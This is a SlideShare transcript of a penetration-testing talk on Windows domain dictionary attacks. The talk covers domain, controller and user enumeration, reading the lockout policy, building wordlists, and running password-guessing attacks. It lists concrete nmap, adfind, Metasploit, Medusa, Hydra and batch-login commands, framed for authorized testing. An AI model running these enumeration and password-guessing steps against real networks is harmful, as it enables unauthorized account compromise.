Your SlideShare is downloading. ×
0
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Introduction to Windows Dictionary Attacks

650

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
650
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  1. Introduction to Windows Dictionary AttacksAuthor: Scott Sutherland
  2. Who am I?Scott Sutherland• Security Consultant @ NetSPI• Over 10 years of consulting experience• Security researcher: Blogs, white papers,tools etc
  3. Presentation Goals• Identify the value of dictionary attacks• Provide new penetration testers with a safeapproach to Windows dictionary attacks• Provide security professionals with questionsthey should be asking their contractors
  4. Before we begin…Dictionary AttackBrute Force Attack
  5. Why dictionary attacks?What are the goals?• Identify accounts configured with weak ordefault passwords – “It’s human nature”• Use accounts as entry points during penetrationtestsWhat’s the impact?• Unauthorized access to critical:‒ Systems‒ Applications‒ data• User impersonation
  6. Are There Alternatives?Yes.Approaches typically includes:• Cracking pw hashes offline with:‒ Pre-computed hash libraries like RainbowTables‒ Brute force and dictionary techniques usingtools like Hashcat and John the Ripper• Dumping clear text passwords frominteractive sessions with Mimikatz
  7. With Alternatives be Covered?No.
  8. Dictionary Attacks: Process OverviewWindows Dictionary Attack Process1. Identify domains2. Enumerate domain controllers3. Enumerate domain users4. Enumerate domain lockout policy5. Create a dictionary6. Perform Attack
  9. Identify Domains: MethodsUnauthenticated Methods• DHCP Information• NetBIOS Queries• DNS Queries• Sniffing Network Traffic• Review RDP drop down listsAuthenticated Methods• Review the output of the SET command for“USERDNSDOMAIN”• Review the registry for the default domain
  10. Identify Domains: ToolsMethod Tools AuthDHCP Info IPCONFIGNoNetBIOS Queries NETSTAT –A <IP> NoDNS Queries nmap -sL <IP Range> -oA output_rnds./reverseraider -r <IP Range>./dnswalk victem.comperl fierce.pl -dns <domainname> -threads5 -file <domainame>-dns.outputNoSniffing Wireshark (GUI) + Filter for browser trafficNetwork Miner (GUI)Etherape (GUI)NoRDP Drop Down nmap –sS –PN –p3389 <IP Range>Then visit with RDP clientNo
  11. Enumerate DCs: MethodsUnauthenticated Methods• DNS Queries• RPC Queries• Port Scanning• NetBIOS ScanningAuthenticated Methods• NET GROUP commands• LDAP Queries
  12. Enumerate DCs: ToolsMethods Tools AuthDNS Queries NSLOOKUP –type=SRV _ldap._tcp.<domain>NoRPC Queries NLTEST /DCLIST <domain>FindPDC <domain> <request count>NoPort Scanning NMAP –sS –p389,636 –PN <IP Range>NoNetBIOSScanningFOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT–A %iNoNET GROUPCommandNet group “Domain Controllers” /domainYesLDAP Queries LDAP Administrator (GUI Tool)Hyena (GUI Tool)adfind -b -sc dcdmp <domain> -gc | grep -i “>name:”| gawk -F ” ” “{print $2}” | sort | uniqYes&No
  13. Enumerate Domain Users: MethodsUnauthenticated Methods• RPC Queries• SID Brute Forcing• SNMP Queries• LDAP Queries• Sharepoint FuzzingAuthenticated Methods• NET USER command• WMI commands
  14. Enumerate Domain Users: Tools 1Methods Tools AuthRPCEndpointsdumpsec.exe /computer=<IP> /rpt=usersonly/saveas=csv /outfile=domain_users.txtenum –N <ip>enum –U <ip>Yes&noSID BruteForcingruby c:metasploitmsf3msfcliauxiliary/scanner/smb/smb_lookupsidSMBDomain=. MaxRID=10000 RHOSTS=<IPAddress> E > domain_users.txtGetacct (GUI)Yes&noSNMPQueriesruby c:metasploitmsf3msfcliauxiliary/scanner/snmp/snmp_enumusersSMBDomain=. RHOSTS=<IP Address> EMibbrowser (GUI)SNMP WalkYes&no
  15. Enumerate Domain Users: Tools 2Methods Tools AuthLDAP Queries adfind -b DC=<victim>,DC=<com> -f“objectcategory=user” -gc | grep -i“sAMAccountName:” | gawk -F “:” “{print $2}” | gawk-F ” ” “{print $1}”| sort > domain_users.txtYes&noSharepointFuzzingFuzz parameters with BURP to enumerate domainusers. Example URL below:https://www.[website].com/sites/[sitename]/_layouts/userdisp.aspx?Force=True&ID=[2 ]Yes&noNET USERSCommandNet users /domain > domain_users.txtYesWMICommandswmic /user:<user> /password:<password> /node:<IPaddress> domain_users.txtYes
  16. Get Domain Lockout Policy: MethodsUnauthenticated Methods• RPC EndpointsAuthenticated Methods• NET ACCOUNTSCommandWhat does it all mean?• Threshold, duration,and windowLockoutthreshold: 5Lockoutduration: 15Lockoutobservationwindow : 15
  17. Get Domain Lockout Policy: ToolsMethods Tools AuthRPC Queries Enum –P <IP Address>dumpsec.exe /computer=<IP> /rpt=policy/saveas=csv /outfile=domain_policy.txtYes&NoNETACCOUNTSCOMMANDNET ACCOUNTSYEs
  18. Create a Dictionary: MethodsClassics Still Work• Blank• Username as password• passwordCommon Formulas = Most Effective• <Password><Number>• <Companyname><Number>• <Season><Year>• <Sports team>Number>Popular Dictionaries• Metasploit dictionaries• Rock you• FuzzDB• John the ripper
  19. Create a Dictionary: ToolsDictionary URLs / ListsClassics Blank passwordUsername as passwordpassword as passwordFormulas<Password><Number><Companyname><Number><Season><Year><Sports team>Number>Your Brain! Think of keywords relative to the targetcompany /geographic location and you’ll get more outof your dictionary attacks!Rockyou http://www.skullsecurity.org/wiki/index.php/PasswordsFuzzDB http://code.google.com/p/fuzzdb/https://github.com/rustyrobot/fuzzdbJohn the Ripper http://www.openwall.com/wordlists/
  20. Perform Dictionary Attack: RulesThe Rule to Live By:Respect the lockout policy• General idea = Attempt a few passwords for allof the domain users each round, not a 1000passwords against one user• Subtract 2 attempts from the lockout policyExample: Lockout=5, Attempts=3• Wait 5 to 10 minutes beyond the observationwindow
  21. Perform Dictionary Attack: ToolsTools Commands OSMedusa medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbntLinuxBruter Easy to use GUI and not CLI that I know of.WindowsMetasploitsmb_loginruby c:metasploitmsf3msfcliauxiliary/scanner/smb/smb_login THREADS=5BLANK_PASSWORDS=true USER_AS_PASS=truePASS_FILE=c:passwords.txtUSER_FILE=c:allusers.txt SMBDomain=.RHOSTS=192.168.1.1 EWindowsand LinuxHydra hydra.exe -L users.txt -P passwords.txt -ocredentials.txt <ip> smbWindowsand LinuxBatch Script FOR /F “tokens=*” %a in (‘type passwords.txt’) donet user <ip>IPC$ /user:<user> %aWindows
  22. Conclusions• There is more than one way to doeverything!• Enumerate all available options• It’s easy to lockout accounts – respect thepassword policy • Always ask contractors what their approachis to reduce the chance of account lockoutsduring penetration tests

×